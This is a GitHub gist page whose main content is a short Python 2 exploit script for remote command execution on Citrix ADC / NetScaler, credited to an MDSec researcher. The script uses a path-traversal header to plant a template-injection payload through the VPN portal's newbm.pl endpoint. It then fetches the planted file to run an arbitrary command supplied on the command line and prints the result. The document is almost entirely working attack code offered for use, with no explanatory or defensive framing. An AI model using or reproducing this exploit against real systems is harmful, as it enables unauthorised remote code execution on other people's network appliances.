Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
template = "[% template.new('BLOCK'='print `{CMD}`') %]".replace("{CMD}",payload)
data = {'url': 'hello.com', 'title': 'ohno', 'desc': template, 'UI_inuse': 'RfWeb'}
headers = {'NSC_USER':'../../../../../../netscaler/portal/templates/HELLO'+append_value,'NSC_NONCE':'nsroot'}
r = requests.post(endpoint,data=data, headers=headers)
# print r.text
# print endpoint
def trigger(url):
trigger_url = url + "/vpns/portal/HELLO" + append_value + ".xml"
headers = {'NSC_USER':'nsroot','NSC_NONCE':'nsroot'}
r = requests.get(trigger_url, headers=headers)
print r.text
if(len(sys.argv)>2):
url = sys.argv[1]
command = sys.argv[2]
print "[+] Sending exploit to: "+ url + " [+]"
upload_file(url,command)
trigger(url)
else:
print "Not enough parameters passed."
print "python exploit.py URL COMMAND"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.